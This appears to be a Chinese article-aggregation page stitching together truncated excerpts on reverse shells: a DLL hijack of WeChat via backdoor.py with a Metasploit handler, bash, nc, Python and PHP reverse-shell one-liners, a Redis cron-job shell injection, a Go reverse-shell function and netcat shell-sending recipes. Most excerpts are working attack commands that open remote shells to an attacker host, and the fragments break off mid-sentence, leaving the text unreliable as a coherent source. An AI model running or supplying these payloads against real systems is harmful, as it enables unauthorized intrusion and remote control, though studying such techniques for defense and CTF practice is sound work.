2019.10.9wechat反弹shell复现】的更多相关文章

./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H 192.168.106.137 msfconsle 打开msf 在msf 中 use exploit/multi/handler set payload windows/shell_reverse_tcp show options 查看配置 set lhost 和lport exploit windows7 替换dll文件,打开微信 kali 接收到反弹的shel…
(该文参考网络他人资料,仅为学习,不许用于非法用途) 一.操作环境 Windows7 :  微信  , Process Explorer(任务管理工具,本实验中用于查找微信程序调用的DLL文件) Kali Linux  :  BDF(劫持工具,可用于DLL注入) 可以互相ping通 二.操作步骤 Step1:在win7中打开微信和Process Explorer,在Process Explorer中找到微信进程,再找到微信调用的DLL文件,如:libEGL.dll Step2:将该文件拷贝到Ka…
1. 反弹Shell的概念本质 所谓的反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端. 本文会先分别讨论: 命令执行(system executor) 网络通信(network api) 这两个基础原子概念,然后在之后的章节中用组合的方式来呈现现在主流的反弹shell技术方式及其原理,用这种横向和纵向拆分的方式来帮助读者朋友更好地理解反弹shell. 2. 网络通信(network api)方式讨论 0…
客户端监听本地: nc -nvlp 4444 从原生的 shell 环境切换到 linux 的交互式 bash 环境: python -c 'import pty; pty.spawn("/bin/bash")' 1.Bash bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 2.Nc nc -e /bin/sh 10.0.0.1 4444 有些版本的NC可能不支持-e选项,不能使用-e时: rm /tmp/f;mkfifo /t…
part1:不求甚解的本地复现 攻击端Debian 10.x:  192.168.208.134 受害端Ubuntu : 192.168.208.135 攻击端打开(监听)某端口:  键入命令:[nc -lvp 8080] 受害端执行反弹shell: 键入命令:[bash -i >& /dev/tcp/192.168.208.134/8080 0>&1] 效果: 可以在攻击机上操作受害机的终端. part2:尝试理解原理 (1) nc -lvp 8080 -l  设置netca…
[前言:在乌云社区看到反弹shell的几种姿势,看过之余自己还收集了一些,动手试了下,仅供参考] 0x01 Bash bash -i >& /dev/tcp/ >& 这里shell由bash解析,有时候是由sh解析,不一定百发百中***在虚拟机里面试过可行,替换成自己的地址和端口即可******/dev/[tcp|upd]/host/port是Linux设备里面比较特殊的文件,读取或写入相当于建立socket调用******由于其特殊性,命令执行后依旧无法找到/dev/tcp目…
from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php 将文件传入shell中,在msf中开一个handlermsf > use multi/handlermsf exploit(handler) > set PAYLOAD php/rever…
参考链接 http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html http://www.waitalone.cn/linux-shell-rebound-under-way.html http://roo7break.co.uk/?p=215 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheethttp://www.91ri.org/936…
python shell与反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端,被攻击端是服务端 反弹shell,先启用服务端,再启用客户端 反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行) shell: 客户端: import socket s=socket.socket() s.connect(("192.168.0.114",1…
01 前言 CTF中一些命令执行的题目需要反弹shell,于是solo一波. 02 环境 win10      192.168.43.151       监听端    装有nc kali       192.168.253.128     反弹端    自带nc/bash/curl... 03 Test it 1.bash反弹 ***/dev/[tcp|udp]/host/port是linux设备里面比较特殊的文件,读取或写入相当于建立socket调用*** ***参考文章及更多骚姿势*** 监…
仅作安全研究 package main import ( "os/exec" "go-pop3" "log" "strings" "net" // "fmt" "syscall" "bufio" "time" ) //反弹shell函数 func reverseshell(addr string){ if c,_:=net.Di…
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的.在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的.既然大牛们懒得科普,那我就只好自己动手了.本文就来探讨一下相关命令实现的原理. Bash 这篇文章的起因就是网上给的Bash反弹shell的实现:1bash -i >& /dev/tcp/10.0.0.1/80…
零.绪论 背景: ThinkPHP框架的--> 找到一个OS命令注入(很简单的Burp可以直接扫出来的那种):页面配置系统默认网关处. 一.渗透过程 1.首先看了一下,没有回显. 2.用ceye.io看DNSlog发现不能连接外网. 3.内网ping ok!说明可以的,确实命令执行. 4.弹bash 最常见的监听端nc nc -p -l -v 二.下面开始弹bash: 1.最常见的bash的 bash -i >& /dev/tcp/a.b.c.d/ >& #没成功,尝试b…
1.   关于反弹shell 就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转. 2.   反弹shell的原因 通常用于被控端因防火墙受限.权限不足.端口被占用等情形 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接.远程桌面,web服务,s…
Redis未授权访问反弹shell 目标主机:10.104.11.178 攻击机:kali 攻击步骤: 1.与目标主机连接 root@kali:~# /usr/redis/redis-cli -h 10.104.11.178 2.kali主机进行监听 nc -l -v -p 9999 3.写入反弹shell语句 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n&quo…
简介 reverse shell反弹shell或者说反向shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转. 通常用于被控端因防火墙受限.权限不足.端口被占用等情形. 什么是反弹,为什么要反弹 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做…
NC 反弹 shell 攻击场景: Victim IP: 192.168.2.10 Attacker IP:192.168.2.11 正向 Shell 我们想要弹回Victim的Shell,使用如下命令: Victim:nc -lvp 9999 -e cmd.exe Attacker:nc 192.168.2.10 9999 ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接 反向 Shell Attacker:nc -vlp 9999 Victim:nc 192.168.2.11 999…
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.git 0x03 漏洞复现 1.生成js脚本 ./pslencode.rb --LHOST 192.168.248…
获取shell的方法总结: shell分为两种,一种是正向shell,另一种是反向shell.如果客户端连接服务器,客户端主动连接服务器,就称为正向shell.如果客户端连接服务器,服务器想要获得客户端的shell,就称为反向shell. 反向shell通常在开启了防护措施的目标机器上,例如防火墙.端口转发等. (1)正向shell 输入如下命令,监听目标主机的4444端口 nc -lvp 4444 -e /bin/bash // linux nc -lvp 4444 -e c:\windows…
反弹shell备忘录 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接.而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹的shell去远程控制服务器了. 接受端运行 nc -lvp port bash bash -i >& /de…
购入了一台阿里云的ESC服务器,以前都用CentOS感觉Yum不怎么方便,这次选的Ubuntu16.04.7 搭好服务之后做安全检查,发现Ubuntu16.04版本漏洞众多:虽然也没有涉及到16.04.7版本(这么说来阿里云给的镜像还是可以的)但升级一下更安全一些:于是就有了今天这篇文章,做个总结. 我原来的内核版本 首先,更新内核版本(4.4x内核有些许漏洞,见图) 一.Linux更新内核版本 1.下载内核deb安装文件 对于Ubuntu,需要去http://kernel.ubuntu.com…
[BJDCTF 2nd]duangShell   [BJDCTF 2nd]duangShell 点击进去之后提示我们swp源代码泄露,访问http://xxx/.index.php.swp下载该文件 该文件产生的原因是:​使用vi编辑器打开文件时,会生成一个.文件名.swp的备份文件,防止意外退出等情况导致文件内容丢失.产生原因主要是管理员在web目录下修改代码文件,导致生成了.swp备份文件. 我们使用vim -r 文件名 来恢复内容,然后按下任意键就可以看到其中的代码了. windows下我…
反弹shell     1.nc         正向连接             攻击机                 nc-vv 受害者ip 受害者port             受害者                 nc-lvvp受害者port - e /bin/bash         反向连接             攻击机                 nc -lvvp 攻击机port             受害者                 nc -vv攻击机ip 攻…
1.1发送文件(公网发内网) 文件发送端: nc -lp 6666 < 文件 文件接收端: nc 发送端ip 发送端端口 > 新文件 1.2发送文件(内网发公网)文件发送端: nc -lp 6666 > 文件 文件接收端: nc 发送端ip 发送端端口 < 新文件 2.聊天发送端: nc -lp 6666 接收端: nc 发送端ip 发送端端口 3.1发送shell发送端(公网服务器): nc -lvvp 发送端port -e /bin/bash 接收端: nc 发送端ip 发送端…
目录 一.简介 二.命令 三.NetCat 一.简介 黑入服务器很少会是通过账号密码的方式进入,因为这很难破解密码和很多服务器都做了限制白名单. 大多是通过上传脚本文件,然后执行脚本开启一个端口,通过那个端口来执行shell命令去操作,这样会非常安全很难被察觉. 二.命令 Bash反弹shell的实现: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 看到这短短的一行代码,正在复习Linux,自我感觉良好的我顿时充满了挫败感,这都是些什么鬼.于是决…
一.专业名词 1.POC:(Proof of Concept),即概念验证.漏洞报告中的POC是一段说明或一个攻击的样例使读者能够确认这个漏洞是真实存在的. 2.EXP:exploit,即漏洞利用.对一段漏洞如何利用进行详细说明或演示攻击代码,使读者了解漏洞原理及利用方法. 3.Payload,攻击载荷.主要用于建立目标机与攻击机之间的稳定连接,并返回一个shell,也可以进行程序注入等.主要分为三种. (1)singles:独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind…
0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点. nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 -u 则调整为udP,默认为tcp,详细参数如下 -g<网关> 设置路由器跃程通信网关,最多可设置8个. -G<指向器数目> 设置来源路由指向器,其数值为4的倍数. -h 在线帮助. -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口. -l 使用监听模式,管控传入的资料.…
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 root@bt:~# nc -e /bin/bash 反弹shell成功后即可在windows的cmd.exe下执行Linux下的/bin/bash的命令了. 注意事项:处于安全角度考虑,nc的-e选项…
SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]…
这篇文章本无技术含量,也不高大上,不过想想,还是写下来吧,肯定有人会用得到的. 常玩系统的朋友,应该知道 Shell 指令,这是一个很好玩很神奇的指令.利用它,可以用简短的单词,轻易地打开系统中的一些特殊目录. 比如,你在“运行”窗口或“文件管理器”的地址栏中输入: shell:SendTo 回车后,你就会看到“发送到”目录被打开. 再比如,你输入: shell:System 回车后,就会打开 System32 目录. 注意,shell 后面是有个冒号(英文冒号)的,然后是特殊目录的简称,不区分…